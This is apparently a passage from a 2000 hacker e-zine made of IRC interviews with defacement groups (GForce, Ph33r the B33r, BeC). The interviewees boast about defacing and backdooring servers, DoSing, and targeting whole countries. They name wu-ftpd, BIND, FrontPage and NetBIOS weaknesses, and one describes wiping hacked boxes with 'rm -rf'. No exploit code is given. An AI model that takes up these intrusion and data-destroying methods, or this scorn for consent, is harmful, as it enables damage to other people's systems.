[13:42] ah, the notification of intrusion could also be used as a social engineering (<- stupid term :P) method, to get the trust, and then attack them from the inside with their consent :>
[13:42] how did you get into computers? what was your initial exposure? first machine?
[13:43] no, I don't care about that, after about 50 news agencies published name, address, birthdate, and photos of me back in february :P
[13:43] k
[13:45] how did you get into computers? what was your initial exposure? first machine?
[13:46] my initial exposure was a c64 I used when I was about 6-8 yrs old
[13:46] i programmed a lot in basic, some machine language later :)
[13:47] Are you self-taught or do you have any official schooling in programming etc?
[13:47] if people wouldnt all start with big PC OS's like windows, they'd probably figure out programming and the ins and outs of computing much better and faster...
[13:47] yeah I started on a vic-20
[13:47] wrote a bbs on it
[13:47] it had 4k ram
[13:47] oh well, the nice feds took away my computer back in 98
[13:48] for what?
[13:48] i hadnt had a pc for 3 months, that was when I read awful lots of programming, networking etc books and really got into the technical aspects
[13:48] for installing some bots on a couple of hosts :]
[13:48] *g*
[13:49] thats about it really, thanks for yer time, any closing comments?
[13:49] hey, nobody's perfect. I really *was* clueless about the tracing stealthing etc aspects of hacking, leave alone the legal stuff back then.. just exploring and doing anything I could :)
[13:49] :-)
[13:49] nope, if you dont have any closing questions ;)
[13:49] when I sold my first c64 system, the guy that bought had nagged and nagged me
[13:50] hehe
[13:50] for some phreaking software i had, I finally gave in and let him have it warning him not to
[13:50] actually use it unless he learned how it worked etc
[13:50] he called me a week later
[13:50] phreaking is something nice.. I really wish I could've done it in the time and/or country when it was feasible and not too dangerous
[13:50] he was busted and had the $750 system confiscated
[13:50] :)
[13:51] aw :)
[13:51] I was into it when I was younger
[13:51] it was fun
[13:51] i spent $3000 on my first PC
[13:51] yeh same here
[13:51] the one that got confiscated ;x
[13:52] I paid $900 for a used 9M hard drive for my c64 bbs and $1000 for the USR 9600 external modem
[13:52] heh
[13:54] funny thinking about a 9 megabyte hard disk these days, it was the size of a ups
[13:55] actually it might have been 7M
[13:55] anyways we're all done i'll ttyl - thanks
Session Close: Sun May 21 13:55:44 2000

END

@HWA

326.0 [HWA] Interview: back to business, political hackers GForce by SugarKing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You have seen the high-profile sites on Attrition that have been defaced by GForce. SugarKing from HWA staff interviews GForce members for a closer look into why they do it.

(c) 2000 by SugarKing/HWA-Security. Please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks.
Mailto: media@hwa-security.net Cruciphux/HWA

[ Session Start - slightly edited ]
[20:59] SugarKing: So we can start the interview ;)
[20:59] sure
[20:59] alright, is this everyone you want present?
[21:00] yes, most of other guys aren't on, some are busy, and it's very early here.
[21:00] yeah
[21:01] ok, you don't have to answer any question if you don't want to...
[21:01] ok
[21:02] so lets begin:)
[21:02] yep
[21:02] ok first off, how many members are there, and who are they?
[21:03] *** sniper- is now known as sniper__
[21:03] ehehe
[21:03] heh
[21:03] services sux
[21:03] There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
[21:03] ok
[21:04] when was the group founded and by who?
[21:04] It was founded about a year ago, and by myself, heataz and miller
[21:05] what was your sole purpose of starting the group? for the reasons you name in your defacements?
[21:06] GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
[21:06] It was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
[21:06] which members are actually from Pakistan?
[21:07] if any
[21:07] we focus on kashmir, basically.
[21:07] so nobody is actually from kashmir?
[21:07] well i`m from pakistan, others would like to stay anonymous please.
[21:08] well no one is from kashmir.
[21:08] sure, np
[21:08] =)
[21:08] some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted?
[21:09] Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
[21:10] yeah of course
[21:11] you are one of, if not the only, people on attrition that I've seen that actually have a REASON
[21:11] instead of just "I 0wn j00"
[21:11] :)
[21:11] *** snipah- (**************) has joined #gforce
[21:11] sorry i got disconnected.
[21:11] US government was targeted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :)
[21:12] big=bit
[21:12] *** sp1n sets mode: +o snipah-
[21:12] and it seems like you guys got some skill, seeing you don't really do any NT hacks
[21:12] *** rpcb1nd (***************) has joined #gforce
[21:12] *** sk0l (*****************) has joined #gforce
[21:12] *** sp1n sets mode: +o rpcb1nd
[21:12] *** sp1n sets mode: +o sk0l
[21:13] i`m glad we don't do NT,
[21:13] we are supported by a study group known as hexa labs
[21:13] what is hexa labs
[21:13] ?
[21:13] Plus every member can code (usefully)
[21:14] hexa labs is a study group, they find out vulnerabilities, code them (we help code)
[21:14] most of it is being kept private.
[21:14] *** sniper__ has quit IRC (Ping timeout)
[21:14] you guys ever use your own exploits when using them on defacing?
[21:15] *** sk0l sets mode: +l 14
[21:16] [rave-:#gforce PING]
[21:16] ehhe
[21:16] alot of times we use own exploitz
[21:16] heh
[21:17] sometimes we use a wuftp (b0f rulz) and bind.. but no details
[21:17] yeah b0f rules
[21:17] :)
[21:17] :)
[21:17] what do you guys think about ./hack kiddies on attrition like the Crime Boys?
[21:18] *** snipah- has quit IRC (Ping timeout)
[21:18] oh
[21:18] we dont appreciate it, we think about just kids who dont know what to do.
[21:19] who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
[21:19] we think about computer security is a big culture and need to dedicate to it, studies, tests, and fucking blowing head
[21:19] eheh
[21:20] crimeboys is very poor
[21:20] NT hackers
[21:20] yeah I agree
[21:20] are most of you guys teenagers?
[21:21] i dunno about sniper but i have 20 yrs old
[21:22] *** sniper__ (***************) has joined #gforce
[21:22] wb
[21:22] *** rave- sets mode: +o sniper__
[21:22] thx
[21:22] so why do you think India is solely responsible for this ordeal in Kashmir?
[21:24] *** rpcb1nd sets mode: +l 13
[21:24] because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
[21:25] *** sp1n sets mode: +l 14
[21:26] nod
[21:26] pretty violent
[21:27] yep.
[21:27] you guys plan on keep defacing and protesting till someone gets busted?
[21:28] not sure, but yes we will be defacing for some while. ;)
[21:28] what do you plan on accomplishing by defacing on this issue?
[21:29] to get people to realize the situation ?
[21:29] yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
[21:30] obviously they 'kashmir' is some guy
[21:30] hahah
[21:31] they thought even.
[21:31] any last comments/shout outs?:)
[21:32] =]
[21:33] yes
[21:34] shoot:)\
[21:35] I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
[21:35] oh and #darknet@efnet ;)
[21:36] last shouts to hwa security ;)
[21:37] hah nice, thanks for the interview:)
[21:37] ah, np
[21:39] [rave-:#gforce PING]

END

@HWA

327.0 [HWA] Interview: Ph33r the B33r by SugarKing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(c) 2000 by SugarKing/HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript.
Thanks
Mailto: media@hwa-security.net Cruciphux/HWA

Note: Originally published in HWA.hax0r.news issue #53 http://welcome.to/HWA.hax0r.news

Exclusive interview by HWA staff writer SugarKing
Contact him at: sugaking@gis.net
Or editor at: cruciphux@dok.org

Session Start: Thu May 04 21:15:55 2000
[21:15] *** Now talking in #vivalaresistance
[21:16] lets do this
[21:16] lock the channel
[21:16] no one knows of it
[21:16] i cant
[21:16] lol
[21:16] ok
[21:16] heh
[21:16] one sec bro
[21:16] werd
[21:16] talking to a chick on the phone:)
[21:17] heh
[21:17] hurry mon aint got much time
[21:17] alright
[21:17] logging now
[21:17] aight
[21:17] you guys don't have to answer anything
[21:17] just say no comment:)
[21:17] iight
[21:17] wtf
[21:17] heh
[21:18] Whats up?
[21:18] Yo we gonna start?
[21:18] so how long has ph33r the b33r been a group?
[21:18] we're already starting:)
[21:18] well
[21:18] Ok : )
[21:18] i recruited people from the early october
[21:18] so lets say october
[21:18] ok...
[21:18] I joined probably in december or november
[21:18] Which one was it p4ntera?
[21:18] november
[21:19] k
[21:19] so you started the group, p4ntera?
[21:19] yes
[21:19] any reason?
[21:19] well
[21:19] and what's with the name?
[21:19] because there wasn't much action going around in the underground
[21:19] LoL
[21:19] that name is joax
[21:19] so
[21:19] i wanted people to know the "scene" aint dead
[21:19] the name?
[21:19] lmao
[21:19] well its a LONNNG story
[21:20] Very long
[21:20] heh
[21:20] yeah
[21:20] he told me once
[21:20] Dont wanna hear it again
[21:20] u still wanna hear it?
[21:20] nah that's ok
[21:20] save some time
[21:20] yeah
[21:20] so how many members to date?
[21:20] holy shit
[21:20] loll
[21:20] 14+
[21:20] 15?
[21:20] most are just shadow members
[21:20] who remain in the background
[21:20] Yah
[21:21] Wait let me think
[21:21] Yah 15 or 16 i can remember
[21:21] that's alot
[21:21] yeah
[21:21] u guys know how many sites you've defaced so far?
[21:21] next?
[21:21] another holy shit =)
[21:21] i would say 20+
[21:21] LoL
[21:21] or don't keep count?
[21:21] 20+?
[21:21] yeah
[21:21] I would say 40
[21:22] And many more to come
[21:22] just guessing
[21:22] heh
[21:22] well
[21:22] i dont wanna sound cocky
[21:22] =)
[21:22] why do you guys deface? fame?
[21:22] nah
[21:22] well i like to show people the underground aint dead
[21:22] and well
[21:22] some for fame too
[21:22] but not all
[21:23] what do you mean "the underground aint dead"?
[21:23] Yah i agree
[21:23] hence why we havent defaced the higher up sites
[21:23] well
[21:23] look on attrition
[21:23] mostly frontpage kiddies, or brazilian kids who cant speak
[21:23] english
[21:23] or both
[21:23] hah ya
[21:23] MSADC GALORE
[21:23] i say the 2 go together in the same sentence
[21:23] HAHA
[21:23] da_pest, dont even give em that =)
[21:23] lol
[21:23] Tru dat
[21:24] hah
[21:24] next?
[21:24] you guys afraid of being busted?
[21:24] hell yeah
[21:24] Of course
[21:24] i dont wanna have a friend named backdoor billy
[21:24] then why do you keep defacing?
[21:24] well
[21:24] You think i want bull shit on my record lol
[21:24] we're in it now
[21:24] we can't stop
[21:24] plus i dont wanna
[21:25] ya you can
[21:25] I did
[21:25] don't wanna? why?
[21:25] i cover my tracks well, and i hide myself
[21:25] i like defacing
[21:25] Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
[21:25] same
[21:25] :)
[21:25] hes right
[21:25] what about ethics?
[21:25] well
[21:25] i did it for awhile
[21:25] i rarely do medical sites
[21:26] but i don't think it's right
[21:26] not needed
[21:26] no msadc
[21:26] eh
[21:26] heh
[21:26] and usually if i feel sorry for the admin
[21:26] i give him the patch
[21:26] if you feel sorry?
[21:26] I think its safe to say NT will be out of PTB for a bit eh p4ntera?
[21:26] haha
[21:26] thats right
[21:26] but now we're going for countries
[21:27] Oh yah
[21:27] countries?
[21:27] as you might have saw, we raped korea pretty bad
[21:27] =)
[21:27] ya i noticed a bit
[21:27] yeah
[21:27] Yah'
[21:27] next is a country that everyone hates
[21:27] we plan to finish it up tommorow (korean sites that is)
[21:27] Yah
[21:28] what about others calling you guys script kiddies and indeed having script kiddies as members
[21:28] We gonna clean up the .kr tomorow eh p4ntera?
[21:28] well
[21:28] not to name any *cough*artech*cough*
[21:28] :)
[21:28] lets not get into artech
[21:28] Ok artech
[21:28] I d liek to say something about him
[21:28] i consider a script kiddie someone who uses scripts and not knows what it actually does
[21:28] sorry like
[21:28] go ahead:)
[21:28] Ok
[21:28] He is basically a frontpage KIDDY
[21:28] yeah
[21:29] yeah I noticed
[21:29] aol kiddie
[21:29] he doesnt even know what NTLM authentication is
[21:29] or
[21:29] how he uses the everyone/guest group to hack with frontpage
[21:29] he just randomly tries sites
[21:29] He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
[21:29] which is pretty fucking lame
[21:29] Ok
[21:29] Go on attrition
[21:29] and look at his hacks
[21:29] Im pretty sure every one of them is NT
[21:29] nah thats not important
[21:29] yeah they are
[21:29] lets move on to something else
[21:29] i don't think he knows what linux is
[21:30] NT can be raped other ways
[21:30] Yah
[21:30] as u saw with what i did
[21:30] But he uses only frontpage
[21:30] yeah
[21:30] Yep
[21:30] that is correct
[21:30] how many memebers code?
[21:30] netbios is a weak fucking protocol
[21:30] well
[21:30] LoL
[21:30] 5-8
[21:30] Very very weak
[21:30] you guys plan on releasing any exploits you may have written?
[21:30] yeas
[21:30] very soon
[21:30] Yep
[21:30] we are probably gonna release some scanners
[21:30] then maybe some exploits
[21:30] Yeah
[21:30] cool
[21:31] depends how much sexor i get in the next few days
[21:31] hah
[21:31] LoL
[21:31] You know ill be getting sex0r from 3r1/\/ lol
[21:31] so all members are generally kids? 15-18?
[21:31] yeah muthafuckas
[21:31] =)
[21:31] no
[21:31] lol
[21:31] we have some universty members
[21:31] but none too old
[21:31] none too young
[21:31] oh
[21:31] around your difference
[21:31] as u said
[21:32] what are you guys trying to prove by defacing?
[21:32] anything?
[21:32] like i said
[21:32] the underground aint dead
[21:32] and
[21:32] that we, as kids, will not take the bullshit the media spews forth
[21:32] about hackers and the like
[21:32] yeah
[21:33] Yep
[21:33] hmm
[21:33] I dont like the stereo types
[21:33] do you guys have a site?
[21:33] not yet
[21:33] we will have one, one of our members needs 2 way cable
[21:33] :P
[21:33] www.b33r.com soon
[21:33] heheh cool
[21:33] Plus we dont even really need one as of this monet
[21:34] moment
[21:34] ya
[21:34] errr.....
[21:34] do you guys plan on ever stop defacing?
[21:34] Me No!
[21:34] Well not for a while at least
[21:35] p4ntera?
[21:35] He is afk
[21:35] oh
[21:35] he is walkin his dog for a sec
[21:35] hah ok
[21:35] He will brb
[21:35] :)
[21:35] i hate dogs
[21:35] they're Pest's:P
[21:35] Why?
[21:35] Like me : )
[21:35] ya
[21:36] I lub puppys
[21:36] :)
[21:36] U gots any other questions?
[21:36] ya, i'm waiting for p4ntera though
[21:36] Oh ok
[21:37] *** p4ntera has quit IRC (Ping timeout)
[21:37] hrm
[21:37] he'll be back
[21:38] Yah
[21:38] so do you use different handles on IRC because you're afraid of getting caught?
[21:38] Not so much getting caught just the fact i dont want to be bothered
[21:39] I dont want some kid to see my defacements and bug me on irc
[21:39] ya
[21:39] how'd you meet p4ntera?
[21:39] but partly because of the illegal activities factor =
[21:39] Honestly we live about a few blocks away from eachother
[21:40] hah cool
[21:40] Yah
[21:40] do you guys talk about your defacements and shit in school?
[21:41] Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
[21:41] Shit sorry for my spelling
[21:41] Im just really cold
[21:41] do your friends know that you guys are into computers?
[21:41] heh
[21:41] it's aight
[21:42] Umm... Well some do but I dont think any know im into defacing
[21:42] Me and p4ntera are the only ones out of my cru that are into this shit
[21:42] ya
[21:43] same as me and Clientel
[21:43] cool
[21:43] we have one class together and he doesn't shut the hell up
[21:43] LoL
[21:43] What does he talk about?
[21:44] about his elite defacements
[21:44] haha nah
[21:44] brb man im gonna log on a nother server im lagged
[21:44] he talks about computers in general
[21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
[21:44] aight
[21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
[21:45] Back!
[21:46] ok
[21:46] where the hell is p4ntera?
[21:46] He walking his damn dog
[21:46] i'll kill it
[21:46] Sorry bout the wait
[21:46] LoL
[21:46] he should be here soon
[21:47] ok
[21:47] sorry for the wait
[21:47] np
[21:48] do u code?
[21:48] yup
[21:48] btw, to set the record, since i'm logging and it's going to be posted
[21:48] I left this group because it was only defacing
[21:49] I didn't want to do it no more
[21:49] Ok...
[21:49] I'll keep my opinion about defacing to myself
[21:49] Why not?
[21:49] but, I'd rather code some nasty shit:)
[21:49] ok gitcha
[21:49] Alot of people dont like defacing
[21:50] But the way I see it...
[21:50] I don't see a need for it
[21:50] If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
[21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
[21:51] wb
[21:51] dog walker:P
[21:51] thanks
[21:51] sorry about that
[21:51] hah
[21:51] Yah wb
[21:51] yeah man your mom is rough with the leash
[21:51] she keeps on bitin git
[21:51] loil
[21:51] *biting it
[21:51] anyways
[21:51] =)
[21:51] back to the question
[21:51] do you guys plan on ever stop defacing?
[21:51] yeah anyways
[21:51] maybe
[21:51] when some of us gets booked
[21:52] or we own the world
[21:52] LoL
[21:52] which ever one comes first
[21:52] heh
[21:52] Me never I wont stop
[21:52] yeah he well
[21:52] *will
[21:52] I enjoy it
[21:52] i would just like to add something?
[21:52] if thats alright?
[21:52] go ahead
[21:52] you got the floor:)
[21:52] I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
[21:52] you asked whats with the "underground aint dead part"
[21:52] ya
[21:52] well
[21:52] if u noticed last year
[21:53] groups like gH,irc.psychic.com and h4g15 were defacing major websites
[21:53] ya
[21:53] showing there weak security
[21:53] now we got people like "crime boys" and artech defacing websites
[21:53] Exactly
[21:53] and these are the people that will protect potentially high up websites?
[21:53] i dont want my bank card protected by these frontpage kiddies
[21:54] Ok course
[21:54] u know what i mean?
[21:54] yah
[21:54] and the sad part is alot of admins are like that
[21:54] true in a sense
[21:54] yeah thats right they are
[21:54] And i mean alot
[21:54] but what about groups like L0pht, who made their fame without defacing?
[21:54] well
[21:54] they were made in the 80's
[21:54] Like look at all of artechs for god sakes
[21:54] when defacing was unheard of
[21:55] bbs hacking
[21:55] what about now?
[21:55] they did do the potentially "dark" side of hacking
[21:55] they could easily deface now
[21:55] yeah but they outgrown that
[21:55] its kind of a teenage thing
[21:55] so you saying you're gonna outgrow it?
[21:55] fuck when i heard mosthated was 19 i was shocked
[21:55] eventually
[21:55] heh
[21:55] ya
[21:56] I dont think I will
[21:56] until i get booked
[21:56] yeah he will
[21:56] heh
[21:56] anyways
[21:56] Umm...
[21:56] No
[21:56] in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
[21:56] yeah
[21:56] which is true
[21:56] funny thing is
[21:56] Tru dat
[21:56] we have 2 members of team echo
[21:56] in our group
[21:56] nameless of course
[21:56] ya I know
[21:56] hehe =)
[21:56] well, had
[21:56] had?
[21:56] one got booked
[21:56] they left?
[21:57] who?
[21:57] another one is still in
[21:57] Analognet
[21:57] Analognet was in ph33r the b33r?
[21:57] yep
[21:57] :)
[21:57] dont be so shocked
[21:57] i didn't know
[21:57] u know who taught him how to hack nt?
[21:57] your talking to him right now
[21:57] heh
[21:57] he learned very fast
[21:57] p4ntera is truly 1337 sh1t lol
[21:57] within a month he knew what i knew
[21:57] He taught me alot
[21:58] and became a nt admin
[21:58] damn right negro
[21:58] cool
[21:58] =)
[21:58] I think as a group we are progressing
[21:58] i totally agree
[21:58] 100%
[21:58] so anything we should know about with the future of ph33r the b33r?
[21:58] yeah
[21:58] We are slowly moving are way up to bigger and better things
[21:58] we are going to be big
[21:58] as da_pest is saying
[21:59] And eventually we are gonna pull a gH and own a big ass site
[21:59] we are the only thing that comes close to a good group
[21:59] of course
[21:59] And that will be a grand finale
[21:59] my boys wkD are there with us
[21:59] Yah
[21:59] oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
[21:59] werd ka0x and BlazinWeed =) [21:59] no [21:59] i know my rights [21:59] too well in fact [21:59] Same [21:59] entrapment is a beautifal thing my friend [21:59] =) [22:00] Plus we make sure people are legit before they join [22:00] and thats why we hang on lame networks [22:00] any last comments? shout out's? flames? [22:00] cause efnet is like 98% sniffed [22:00] well [22:00] i would like to say to sinfony, aka john dough [22:00] lol [22:00] DIE [22:00] that i respect his skills [22:00] i recently found out he is r3p3nt from dhc, which kinda sucks for me [22:00] because i respect dhc as a group [22:00] and him especially [22:01] even though he flamed us [22:01] he has his skills [22:01] but he is still a ass [22:01] that will likely never change [22:01] hehe :) [22:01] heh [22:01] anything from you, Pest? [22:01] He is a bigger ass then m4rth4 lol [22:01] Yah i just gotta say look out bitches cause PTB Is climbing our way up [22:01] heh [22:02] And soon we will not be able to be touched [22:02] i would like to say some more as well [22:02] that is right [22:02] these 3rd world countries are our playgrounds [22:02] once we master our abilities, we are coming for the higher ups [22:02] Yah [22:02] that it?:) [22:02] once we recruit some more members, we are coming [22:02] you cannot stop it [22:02] no one can =) [22:02] Oh Yah [22:03] and [22:03] i would like to say [22:03] Sugarking is one sexy cum muffin [22:03] =) [22:03] hahah [22:03] thanks for the interview d00dz [22:03] ok [22:03] heh [22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?) 
Session Close: Thu May 04 22:04:39 2000

END

@HWA

327.1 [HWA] Interview: BeC, some oldskewl muscle makes some noise. (additional feature)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interview with BeC by Cruciphux, Oct 2000

This is an interview with Kr_D of the fledgling hacking outfit known only as BeC (Binary Equipment Corporation), a name based on DEC, since that machine was prevalent in the movie Takedown (not released here in Canada at this time). It was conducted across a few days, in parts, and is assembled here with the less interesting parts and chit-chat removed.

One site recently (and curiously STILL defaced) by BeC was the quantum physics lab (?) at wesleyan.edu: http://quantum.phys.wesleyan.edu/ As far as I know it has not been listed on Attrition, nor apparently even noticed by the admins. Some other sites were also hit with a similar defacement, but as our interviewee tells us, BeC is not all about defacing.

Interviewed: Kr_D (BeC). Kr_D is a pseudonym; since others use his usual nick on IRC, we altered it for this interview to avoid any confusion.
Conducted by: Cruciphux (Informal)
http://hwa-security.net/BeC.txt

Old school ascii art from the quantum hack:

[]-=-=_===--=-=--=w00f,-=--=-aND=--=--=_-=gr33tinGs=--=--=-fR0m----=--__=--=-=[] .. R .yHJ^*^ H _._ .C^' _._ `# cYk"^%Hn KH :TGTH) U, .C" .U HD: . ####$$&' K _ KD_,,n#^^"' CD, d' ""^#"' H b^^ccn, #L^'" . "KGg,oY^" J#^' `:5 CD. _,S' o&HD: cH "KKg,oP^" ,h' ^K .k" KD. .gh' [ KrD ] Hysdp' ,uY#L^" .-[m0FF] | [m0FF]-' []-=-===--=-=tH3--=_-=--=b1n4Ry--=--=eQUiPM3n7-=_-=--=-=-=cO0PERA7i0n=--_--=-=[]

/SNIP/

Session Start: Sat Oct 28 17:05:18 2000
[17:05] *** Now talking in #INTERVIEW_BeC [§] Channel [ #INTERVIEW_BeC ] Modes [ + ] [17:05] -> *Kr_D* hey [17:06] *** Kr_D (~k0rrupt@213.x.x.x) has joined #INTERVIEW_BeC [17:06] hell0w stevie [17:06] *** [HWA] sets mode: +k werebizzy [17:06] <[HWA]> hewo [17:06] heh [17:06] <[HWA]> how are you today?
[17:06] <[HWA]> lets interview [17:06] <[HWA]> :) [17:07] i am very fine indeed [17:07] xept for all thos P-H-O-C-K-E-N [17:07] <[HWA]> firstly i heard you had sex with animals when you were young is this true? [17:07] tcpwrapped boxes [17:07] <[HWA]> just kidding [17:07] <[HWA]> lol [17:07] everywere [17:07] it's true [17:07] how did you know? [17:07] <[HWA]> ok seriously [17:07] <[HWA]> hehe [17:07] ok [17:07] <[HWA]> first why don't you introduce yourself [17:08] Hi, my name is KrD [17:08] and i'm a crackinga ddict [17:08] <[HWA]> then i'll get into questions [17:08] addict even [17:08] <[HWA]> as opposed to a crack addict [17:08] <[HWA]> good [17:08] <[HWA]> [17:08] <[HWA]> what have you cracked recently? [17:08] like, erm.. [17:08] distort it = edit? [17:08] <[HWA]> what nick shall i use for the interview? [17:08] Kr_D [17:08] <[HWA]> no as in take out silly chatter [17:09] <[HWA]> no distortion [17:09] sed -e 's/Kr_D/KrD;w chat.txt' [17:09] <[HWA]> you want to see the copy before it is released? [17:09] sure [17:09] <[HWA]> that is perfectly acceptable. [17:09] so, no #phrack editing shit [17:09] with evil comments [17:09] <[HWA]> no [17:09] and "tounting" [17:09] <[HWA]> no comments [17:09] (i like that word) [17:09] <[HWA]> tounting? is that like taunting only obfuscated? [17:10] yeah [17:10] <[HWA]> whats your opinion of Phrack? do u hang in their channel #phrack on EFNet? [17:10] sometimes [17:10] i like phrack [17:10] they don't like me thou [17:10] <[HWA]> why is that? [17:11] DNS: 213.x.x.x [17:11] dono [17:11] do they like anyone? [17:11] <[HWA]> they certainly don't tolerate vhosts they seem to have now sense of humour [17:11] heh [17:11] <[HWA]> my take is they are elitist ego trippers. [17:11] they have humor [17:11] <[HWA]> comment? 
[17:11] sarcastic humor [17:11] <[HWA]> yes i laugh at them often [17:11] they are to eleet fro them selfes [17:11] they really are eleet [17:11] <[HWA]> Phrack isn't the same since Bloodaxe left [17:11] but, it's like when, [17:11] er,.. [17:12] yeah, like britney spears [17:12] <[HWA]> Chris Goggins [17:12] look at her before she got famous [17:12] and look at her now [17:12] she has become more rude and stuff [17:12] <[HWA]> i didn't know of her before she was famous [17:12] she thinks she is better then other [17:12] <[HWA]> have you defaced her? [17:12] <[HWA]> :) [17:12] i have defaced her but with something else [17:12] heh [17:13] <[HWA]> honestly i wouldn't mind finding a local root compromise to that snatch [17:13] i mean, like two years ago [17:13] <[HWA]> but i digress [17:14] heh [17:15] <[HWA]> hrm [17:15] ok, [17:15] <[HWA]> what have you cracked recently that is of import and what if any group are you affiliating with? [17:15] * [HWA] trys to steer back on track [17:16] <[HWA]> tries even [17:16] of import [17:16] hmmss.. [17:16] <[HWA]> well any then. [17:16] heh [17:16] <[HWA]> what was you last crack [17:16] <[HWA]> not girl i mean site hack [17:16] <[HWA]> lol [17:16] ah [17:17] *** [HWA] sets mode: +o Kr_D [17:17] *.*.???okyo.??.jp [17:17] my favourite is *.???.xx.jp [17:17] <[HWA]> what OS was it running on? i note the iis in there and think NT but ... [17:17] it rules [17:17] they are running al lil' bit of everything [17:17] NT / SOlaris / IRIX / HP-UX / BSDI / RH6.2 [17:17] blah blah blah [17:18] <[HWA]> well what OS was the box you owned running? do you target any particular OS or what [17:18] <[HWA]> do you use other peoples scripts or write your own exploits/find your own holes? [17:18] rome is running Solaris [17:18] heh [17:18] it depends [17:18] <[HWA]> did you back door them or just do hit and run hacks? [17:19] i own them [17:19] i don't deface usually [17:19] <[HWA]> do you use the boxes for DoSing? 
ie: install trinoo or anything on these boxes? [17:19] i have defaced two sites this week even [17:19] (for u) [17:19] heh [17:19] <[HWA]> don't say that [17:19] <[HWA]> be more general [17:19] haha [17:19] <[HWA]> for media attention [17:19] DoSing is so lame [17:19] <[HWA]> =) [17:20] <[HWA]> yes but it is still very prevalent on the net, so you never packet? [17:20] <[HWA]> have you EVER packetted anyone? [17:20] i packet when i want a channel [17:20] <[HWA]> I have in my early days. [17:20] or when i need to get something down to be able to spoof it [17:20] <[HWA]> but DoSing commercial sites etc then is lame? [17:20] 's ip [17:20] <[HWA]> ok [17:20] <[HWA]> makes sense [17:20] i did it once, to try [17:21] <[HWA]> whats your opinion of say, mafiaboy? [17:21] i DoS regulary to get bot's away [17:21] heh [17:21] but when i dos [17:21] i use my own tools [17:21] make it a lil' more eleet [17:21] <[HWA]> what do you think of last sunday's 0wn4ge of EFnet? [17:21] i didnt notice ity [17:21] <[HWA]> by Z----- and GG----- [17:22] heh [17:22] it's lame [17:22] really lame [17:22] <[HWA]> it happened sunday morning [17:22] there's no meaning at all to destroy stuff [17:22] <[HWA]> they did it to protest mafiaboy and shadowknight's incarceration [17:22] if i crash a box, it's because i hate the admin [17:22] who is that mafia boy? [17:23] i read a lil about him in hwa.hax0r.news [17:23] <[HWA]> how do you crash the box? forkbombs or something more destructive [17:23] ./own.sh [17:23] and when your root on the box [17:23] <[HWA]> he took out some major sites like yahoo.com and i think cnn.com using mstream [17:23] rm -rf [17:23] heh [17:23] i don't like packed kiddies [17:23] or IRCWarriors(tm) [17:23] <[HWA]> m_____ came up with the idea for mstream, its loosely based on tfn2k [17:24] it's nicer to have yahoo.com [17:24] then having crashed it [17:24] <[HWA]> when you deface a site do you have a message or is it just for the sake of recognition? 
[17:24] <[HWA]> what name are you trying to get out to the people? [17:24] <[HWA]> and why? [17:24] its for recognition [17:24] BeC [17:24] <[HWA]> are you worried about being busted? [17:24] The binary equipment corporation [17:24] yes [17:24] <[HWA]> you are in Sweden correct? [17:25] of cause i am [17:25] NO [17:25] WHO THE PHUCK SAID THAT [17:25] heh [17:25] i'm from scandinavia [17:25] <[HWA]> maybe i'm conf00zed [17:25] <[HWA]> ah ok [17:25] thats all you need to know [17:25] <[HWA]> good nuff [17:25] muff muff [17:25] <[HWA]> the point was what are the computer laws like in your country? [17:25] mean ones [17:26] <[HWA]> aside: how do you say greetings and props in scandanavian? [17:26] thy shalt not 0wn(r) #phrack 0x7d0-0x7d9 [17:26] computahz [17:26] <[HWA]> aside: teach me some werdz [17:26] i usually say: "hellauw" [17:26] <[HWA]> the laws are stringent then like the U.S [17:26] or "hi" [17:26] <[HWA]> haha [17:27] <[HWA]> hi? thats a strange word [17:27] yeah [17:27] <[HWA]> here we say garshnuggeen [17:27] <[HWA]> rofl [17:27] okey [17:27] <[HWA]> are u a smartass would you say? [17:27] a smartass [17:27] <[HWA]> [17:27] smartass = unknown calss [17:28] (it rythmes, whoii) [17:28] <[HWA]> do you have a message for the scene or general netizens? [17:28] class even [17:28] <[HWA]> nod [17:28] BeC is god? [17:28] <[HWA]> ok [17:28] good even [17:28] heh [17:28] <[HWA]> and why did you choose 'BeC' as the group name? [17:28] <[HWA]> there is a story behind it no? [17:28] i saw it in a movie [17:28] "takedown operation" [17:28] <[HWA]> which movie [17:29] <[HWA]> i haven't seen that, the mitnick movie? [17:29] it's based upon mitnicks lil adventures [17:29] <[HWA]> its not released in North America yet [17:29] back in the 90;s [17:29] they can't use DEC for (c) reasons [17:29] 